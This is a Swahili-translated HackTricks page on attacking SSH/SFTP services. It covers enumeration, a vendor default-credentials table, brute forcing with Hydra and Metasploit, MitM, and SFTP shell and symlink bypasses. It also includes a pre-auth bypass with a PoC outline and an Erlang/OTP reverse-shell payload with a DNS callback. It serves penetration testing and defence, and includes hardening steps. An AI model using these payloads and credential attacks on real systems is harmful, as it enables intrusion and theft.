22 - Pentesting SSH/SFTP
Reading time: 16 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na π¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter π¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Basic Information
SSH (Secure Shell au Secure Socket Shell) ni protokali ya mtandao inayowezesha muunganisho salama kwa kompyuta kupitia mtandao usio salama. Ni muhimu kwa kudumisha usiri na uadilifu wa data unapofikia mifumo ya mbali.
Bandari ya kawaida: 22
22/tcp open ssh syn-ack
SSH servers:
- openSSH β OpenBSD SSH, iliyotolewa katika BSD, usambazaji wa Linux na Windows tangu Windows 10
- Dropbear β utekelezaji wa SSH kwa mazingira yenye kumbukumbu na rasilimali za processor za chini, iliyotolewa katika OpenWrt
- PuTTY β utekelezaji wa SSH kwa Windows, mteja hutumiwa mara nyingi lakini matumizi ya seva ni nadra
- CopSSH β utekelezaji wa OpenSSH kwa Windows
SSH libraries (implementing server-side):
- libssh β maktaba ya C ya majukwaa mengi inayotekeleza protokali ya SSHv2 ikiwa na viambatisho katika Python, Perl na R; inatumika na KDE kwa sftp na na GitHub kwa miundombinu ya git SSH
- wolfSSH β maktaba ya seva ya SSHv2 iliyoandikwa kwa ANSI C na iliyolengwa kwa mazingira yaliyo na rasilimali chache, RTOS, na zilizozuiliwa
- Apache MINA SSHD β maktaba ya Apache SSHD ya java inategemea Apache MINA
- paramiko β maktaba ya protokali ya Python SSHv2
Enumeration
Banner Grabbing
nc -vn <IP> 22
Automated ssh-audit
ssh-audit ni chombo cha ukaguzi wa usanidi wa ssh server na mteja.
https://github.com/jtesta/ssh-audit ni toleo lililosasishwa kutoka https://github.com/arthepsy/ssh-audit/
Features:
- Msaada wa protokali za SSH1 na SSH2;
- changanua usanidi wa mteja wa SSH;
- pata banner, tambua kifaa au programu na mfumo wa uendeshaji, gundua compression;
- kusanya funguo za kubadilishana, funguo za mwenyeji, algorithms za encryption na code za uthibitishaji wa ujumbe;
- toa taarifa za algorithm (zinapatikana tangu, zimetolewa/kuzima, zisizo salama/dhaifu/mzee, nk);
- toa mapendekezo ya algorithm (ongeza au ondoa kulingana na toleo la programu lililotambuliwa);
- toa taarifa za usalama (masuala yanayohusiana, orodha ya CVE iliyotolewa, nk);
- changanua ulinganifu wa toleo la SSH kulingana na taarifa za algorithm;
- taarifa za kihistoria kutoka OpenSSH, Dropbear SSH na libssh;
- inafanya kazi kwenye Linux na Windows;
- haina utegemezi
usage: ssh-audit.py [-1246pbcnjvlt] <host>
-1, --ssh1 force ssh version 1 only
-2, --ssh2 force ssh version 2 only
-4, --ipv4 enable IPv4 (order of precedence)
-6, --ipv6 enable IPv6 (order of precedence)
-p, --port=<port> port to connect
-b, --batch batch output
-c, --client-audit starts a server on port 2222 to audit client
software config (use -p to change port;
use -t to change timeout)
-n, --no-colors disable colors
-j, --json JSON output
-v, --verbose verbose output
-l, --level=<level> minimum output level (info|warn|fail)
-t, --timeout=<secs> timeout (in seconds) for connection and reading
(default: 5)
$ python3 ssh-audit <IP>
Funguo za SSH za umma za seva
ssh-keyscan -t rsa <IP> -p <PORT>
Algorithimu za Cipher Zenye Ukatili
Hii inagundulika kwa default na nmap. Lakini unaweza pia kutumia sslcan au sslyze.
Skripti za Nmap
nmap -p22 <ip> -sC # Send default nmap scripts for SSH
nmap -p22 <ip> -sV # Retrieve version
nmap -p22 <ip> --script ssh2-enum-algos # Retrieve supported algorythms
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full # Retrieve weak keys
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root" # Check authentication methods
Shodan
ssh
Brute force usernames, passwords and private keys
Username Enumeration
Katika toleo fulani la OpenSSH unaweza kufanya shambulio la muda ili kuhesabu watumiaji. Unaweza kutumia moduli ya metasploit ili kutumia hii:
msf> use scanner/ssh/ssh_enumusers
Brute force
Baadhi ya akisi za kawaida za ssh hapa na hapa na chini.
Private Key Brute Force
Ikiwa unajua baadhi ya funguo za kibinafsi za ssh ambazo zinaweza kutumika... hebu jaribu. Unaweza kutumia skripti ya nmap:
https://nmap.org/nsedoc/scripts/ssh-publickey-acceptance.html
Au moduli wa msaada wa MSF:
msf> use scanner/ssh/ssh_identify_pubkeys
Or use ssh-keybrute.py
(native python3, lightweight and has legacy algorithms enabled): snowdroppe/ssh-keybrute.
Known badkeys can be found here:
ssh-badkeys/authorized at master \xc2\xb7 rapid7/ssh-badkeys \xc2\xb7 GitHub
Weak SSH keys / Debian predictable PRNG
Baadhi ya mifumo yana kasoro zinazojulikana katika mbegu ya nasibu inayotumika kuunda vifaa vya kificho. Hii inaweza kusababisha kupungua kwa kiwango cha funguo ambacho kinaweza kufanywa kwa nguvu. Seti za funguo zilizoundwa awali kwenye mifumo ya Debian iliyoathiriwa na PRNG dhaifu zinapatikana hapa: g0tmi1k/debian-ssh.
Unapaswa kutazama hapa ili kutafuta funguo halali za mashine ya mwathirika.
Kerberos
crackmapexec kutumia itifaki ya ssh
inaweza kutumia chaguo --kerberos
ili kujiandikisha kupitia kerberos.
Kwa maelezo zaidi, endesha crackmapexec ssh --help
.
Default Credentials
Vendor | Usernames | Passwords |
---|---|---|
APC | apc, device | apc |
Brocade | admin | admin123, password, brocade, fibranne |
Cisco | admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin | admin, Admin123, default, password, secur4u, cisco, Cisco, _Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme |
Citrix | root, nsroot, nsmaint, vdiadmin, kvm, cli, admin | C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler |
D-Link | admin, user | private, admin, user |
Dell | root, user1, admin, vkernel, cli | calvin, 123456, password, vkernel, Stor@ge!, admin |
EMC | admin, root, sysadmin | EMCPMAdm7n, Password#1, Password123#, sysadmin, changeme, emc |
HP/3Com | admin, root, vcx, app, spvar, manage, hpsupport, opc_op | admin, password, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC_op, !manage, !admin |
Huawei | admin, root | 123456, admin, root, Admin123, Admin@storage, Huawei12#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123 |
IBM | USERID, admin, manager, mqm, db2inst1, db2fenc1, dausr1, db2admin, iadmin, system, device, ufmcli, customer | PASSW0RD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer |
Juniper | netscreen | netscreen |
NetApp | admin | netapp123 |
Oracle | root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user | changeme, ilom-admin, ilom-operator, welcome1, oracle |
VMware | vi-admin, root, hqadmin, vmware, admin | vmware, vmw@re, hqadmin, default |
SSH-MitM
Ikiwa uko kwenye mtandao wa ndani kama mwathirika ambaye atajiunga na seva ya SSH kwa kutumia jina la mtumiaji na nenosiri, unaweza kujaribu kufanya shambulio la MitM ili kuiba akreditivu hizo:
Njia ya shambulio:
- Uelekezaji wa Trafiki: Mshambuliaji anahamisha trafiki ya mwathirika kwenye mashine yao, kwa ufanisi akikamata jaribio la kuungana na seva ya SSH.
- Kukamata na Kurekodi: Mashine ya mshambuliaji inafanya kazi kama proxy, ikikamata maelezo ya kuingia ya mtumiaji kwa kujifanya kuwa seva halali ya SSH.
- Utendaji wa Amri na Uhamasishaji: Hatimaye, seva ya mshambuliaji inakumbuka akreditivu za mtumiaji, inasambaza amri kwa seva halisi ya SSH, inafanya hizo, na inatuma matokeo nyuma kwa mtumiaji, ikifanya mchakato huo kuonekana kuwa wa kawaida na halali.
SSH MITM inafanya hasa kile kilichoelezwa hapo juu.
Ili kukamata kufanya MitM halisi unaweza kutumia mbinu kama ARP spoofing, DNS spoofing au nyingine zilizoelezwa katika Network Spoofing attacks.
SSH-Snake
Ikiwa unataka kupita mtandao kwa kutumia funguo za kibinafsi za SSH zilizogunduliwa kwenye mifumo, ukitumia kila funguo ya kibinafsi kwenye kila mfumo kwa ajili ya mwenyeji mpya, basi SSH-Snake ndiyo unayohitaji.
SSH-Snake inatekeleza kazi zifuatazo kiotomatiki na kwa kurudiarudia:
- Kwenye mfumo wa sasa, pata funguo zozote za kibinafsi za SSH,
- Kwenye mfumo wa sasa, pata mwenyeji au marudio yoyote (mtumiaji@kuhost) ambayo funguo za kibinafsi zinaweza kukubaliwa,
- Jaribu kuingia SSH kwenye marudio yote kwa kutumia funguo zote za kibinafsi zilizogunduliwa,
- Ikiwa marudio yameunganishwa kwa mafanikio, rudia hatua #1 - #4 kwenye mfumo uliounganishwa.
Ni ya kujirudia kabisa na kujiendeleza -- na haina faili kabisa.
Config Misconfigurations
Root login
Ni kawaida kwa seva za SSH kuruhusu kuingia kwa mtumiaji wa root kwa default, ambayo inatoa hatari kubwa ya usalama. Kuzima kuingia kwa root ni hatua muhimu katika kulinda seva. Upatikanaji usioidhinishwa na mamlaka ya utawala na mashambulizi ya nguvu yanaweza kupunguziliwa mbali kwa kufanya mabadiliko haya.
Ili Kuzima Kuingia kwa Root katika OpenSSH:
- Hariri faili ya usanidi ya SSH kwa:
sudoedit /etc/ssh/sshd_config
- Badilisha mipangilio kutoka
#PermitRootLogin yes
hadiPermitRootLogin no
. - Reload usanidi kwa kutumia:
sudo systemctl daemon-reload
- Restart seva ya SSH ili kutekeleza mabadiliko:
sudo systemctl restart sshd
SFTP Brute Force
SFTP command execution
Kuna makosa ya kawaida yanayotokea na mipangilio ya SFTP, ambapo wasimamizi wanakusudia kwa watumiaji kubadilishana faili bila kuwezesha ufikiaji wa shell ya mbali. Licha ya kuweka watumiaji na shells zisizoingiliana (k.m., /usr/bin/nologin
) na kuwafunga kwenye directory maalum, kuna pengo la usalama. Watumiaji wanaweza kupita vizuizi hivi kwa kuomba utekelezaji wa amri (kama /bin/bash
) mara tu baada ya kuingia, kabla shell yao isiyoingiliana haijachukua. Hii inaruhusu utekelezaji wa amri zisizoidhinishwa, ikikandamiza hatua za usalama zilizokusudiwa.
ssh -v noraj@192.168.1.94 id
...
Password:
debug1: Authentication succeeded (keyboard-interactive).
Authenticated to 192.168.1.94 ([192.168.1.94]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Sending command: id
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
uid=1000(noraj) gid=100(users) groups=100(users)
debug1: channel 0: free: client-session, nchannels 1
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
Bytes per second: sent 43133.4, received 44349.5
debug1: Exit status 0
$ ssh noraj@192.168.1.94 /bin/bash
Hapa kuna mfano wa usanidi salama wa SFTP (/etc/ssh/sshd_config
β openSSH) kwa mtumiaji noraj
:
Match User noraj
ChrootDirectory %h
ForceCommand internal-sftp
AllowTcpForwarding no
PermitTunnel no
X11Forwarding no
PermitTTY no
Hii usanidi itaruhusu tu SFTP: kuzuia ufikiaji wa shell kwa kulazimisha amri ya kuanzisha na kuzuia ufikiaji wa TTY lakini pia kuzuia aina zote za upitishaji bandari au tunneling.
SFTP Tunneling
Ikiwa una ufikiaji wa seva ya SFTP unaweza pia kupitisha trafiki yako kupitia hii kwa mfano ukitumia upitishaji bandari wa kawaida:
sudo ssh -L <local_port>:<remote_host>:<remote_port> -N -f <username>@<ip_compromised>
SFTP Symlink
The sftp have the command "symlink". Therefor, if you have writable rights in some folder, you can create symlinks of other folders/files. As you are probably trapped inside a chroot this won't be specially useful for you, but, if you can access the created symlink from a no-chroot service (for example, if you can access the symlink from the web), you could open the symlinked files through the web.
Kwa mfano, ili kuunda symlink kutoka kwa faili mpya "froot" hadi "/":
sftp> symlink / froot
Ikiwa unaweza kufikia faili "froot" kupitia wavuti, utaweza kuorodhesha folda ya mzizi ("/") ya mfumo.
Njia za uthibitishaji
Katika mazingira ya usalama wa juu, ni kawaida kuwezesha tu uthibitishaji wa msingi wa funguo au uthibitishaji wa hatua mbili badala ya uthibitishaji wa msingi wa nenosiri rahisi. Lakini mara nyingi njia za uthibitishaji zenye nguvu zinawezeshwa bila kuzima zile dhaifu. Kesi ya kawaida ni kuwezesha publickey
kwenye usanidi wa openSSH na kuipanga kama njia ya default lakini bila kuzima password
. Hivyo kwa kutumia hali ya verbose ya mteja wa SSH, mshambuliaji anaweza kuona kwamba njia dhaifu imewezeshwa:
ssh -v 192.168.1.94
OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019
...
debug1: Authentications that can continue: publickey,password,keyboard-interactive
Kwa mfano, ikiwa kikomo cha kushindwa kwa uthibitishaji kimewekwa na hujapata nafasi ya kufikia njia ya nywila, unaweza kutumia chaguo la PreferredAuthentications
kulazimisha kutumia njia hii.
ssh -v 192.168.1.94 -o PreferredAuthentications=password
...
debug1: Next authentication method: password
Kukagua usanidi wa seva ya SSH ni muhimu ili kuhakikisha kwamba njia pekee zinazotarajiwa zimeidhinishwa. Kutumia hali ya verbose kwenye mteja kunaweza kusaidia kuona ufanisi wa usanidi.
Config files
ssh_config
sshd_config
authorized_keys
ssh_known_hosts
known_hosts
id_rsa
Fuzzing
- https://packetstormsecurity.com/files/download/71252/sshfuzz.txt
- https://www.rapid7.com/db/modules/auxiliary/fuzzers/ssh/ssh_version_2
Authentication State-Machine Bypass (Pre-Auth RCE)
Mifumo kadhaa ya seva ya SSH ina kasoro za mantiki katika mashine ya hali ya uthibitishaji ambayo inaruhusu mteja kutuma ujumbe wa protocol ya muunganisho kabla ya uthibitishaji kukamilika. Kwa sababu seva inashindwa kuthibitisha kuwa iko katika hali sahihi, ujumbe hao unashughulikiwa kana kwamba mtumiaji ameidhinishwa kikamilifu, na kusababisha utendaji wa msimbo usio na uthibitisho au uundaji wa kikao.
Katika ngazi ya protokali, ujumbe wowote wa SSH wenye nambari ya ujumbe β₯ 80 (0x50) unahusiana na tabaka la muunganisho (RFC 4254) na lazima ukubali tu baada ya uthibitishaji kufanikiwa (RFC 4252). Ikiwa seva inashughulikia moja ya ujumbe hao wakati bado iko katika hali ya SSH_AUTHENTICATION, mshambuliaji anaweza mara moja kuunda channel na kuomba vitendo kama vile utekelezaji wa amri, kuhamasisha bandari, n.k.
Generic Exploitation Steps
- Establish a TCP connection to the targetβs SSH port (commonly 22, but other services may expose Erlang/OTP on 2022, 830, 2222β¦).
- Craft a raw SSH packet:
- 4-byte packet_length (big-endian)
- 1-byte message_code β₯ 80 (e.g.
SSH_MSG_CHANNEL_OPEN
= 90,SSH_MSG_CHANNEL_REQUEST
= 98) - Payload that will be understood by the chosen message type
- Send the packet(s) before completing any authentication step.
- Interact with the server APIs that are now exposed pre-auth (command execution, port forwarding, file-system access, β¦).
Python proof-of-concept outline:
import socket, struct
HOST, PORT = '10.10.10.10', 22
s = socket.create_connection((HOST, PORT))
# skip version exchange for brevity β send your own client banner then read server banner
# β¦ key exchange can be skipped on vulnerable Erlang/OTP because the bug is hit immediately after the banner
# Packet: len(1)=1, SSH_MSG_CHANNEL_OPEN (90)
pkt = struct.pack('>I', 1) + b'\x5a' # 0x5a = 90
s.sendall(pkt)
# additional CHANNEL_REQUEST packets can follow to run commands
Katika mazoezi utahitaji kufanya (au kupuuzia mbali) ubadilishanaji wa funguo kulingana na utekelezaji wa lengo, lakini hakuna uthibitisho unaofanywa kamwe.
Erlang/OTP sshd
(CVE-2025-32433)
- Tofauti zilizokumbwa: OTP < 27.3.3, 26.2.5.11, 25.3.2.20
- Sababu ya msingi: daemoni ya SSH ya asili ya Erlang haitathmini hali ya sasa kabla ya kuita
ssh_connection:handle_msg/2
. Hivyo, pakiti yoyote yenye msimbo wa ujumbe 80-255 inafikia mpangilio wa muunganisho wakati kikao bado kiko katika hali ya userauth. - Athari: utendaji wa msimbo wa mbali usio na uthibitisho (daemoni kwa kawaida inafanya kazi kama root kwenye vifaa vilivyojumuishwa/OT).
Mfano wa mzigo unaozalisha shell ya kurudi iliyounganishwa na channel inayodhibitiwa na mshambuliaji:
% open a channel first β¦ then:
execSinet:cmd(Channel, "exec('/bin/sh', ['-i'], [{fd, Channel#channel.fd}, {pid, true}]).").
Blind RCE / out-of-band detection inaweza kufanywa kupitia DNS:
execSinet:gethostbyname("<random>.dns.outbound.watchtowr.com").Zsession
Detection & Mitigation:
- Inspect SSH traffic: ondoa pakiti yoyote yenye nambari ya ujumbe β₯ 80 iliyogunduliwa kabla ya uthibitishaji.
- Upgrade Erlang/OTP to 27.3.3 / 26.2.5.11 / 25.3.2.20 or newer.
- Restrict exposure of management ports (22/2022/830/2222) β hasa kwenye vifaa vya OT.
Other Implementations Affected
- libssh 0.6 β 0.8 (server side) β CVE-2018-10933 β inakubali
SSH_MSG_USERAUTH_SUCCESS
isiyo na uthibitisho iliyotumwa na mteja, kwa ufanisi ni kasoro ya mantiki kinyume.
Somoo la kawaida ni kwamba mabadiliko yoyote kutoka kwa mabadiliko ya hali yaliyotolewa na RFC yanaweza kuwa na madhara; unapokagua au kufanyia fuzzing SSH daemons zingatia kwa makini utekelezaji wa mashine ya hali.
References
HackTricks Automatic Commands
Protocol_Name: SSH
Port_Number: 22
Protocol_Description: Secure Shell Hardening
Entry_1:
Name: Hydra Brute Force
Description: Need Username
Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 {IP} ssh
Entry_2:
Name: consolesless mfs enumeration
Description: SSH enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_version; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use scanner/ssh/ssh_enumusers; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ssh/juniper_backdoor; set RHOSTS {IP}; set RPORT 22; run; exit'
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na π¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter π¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.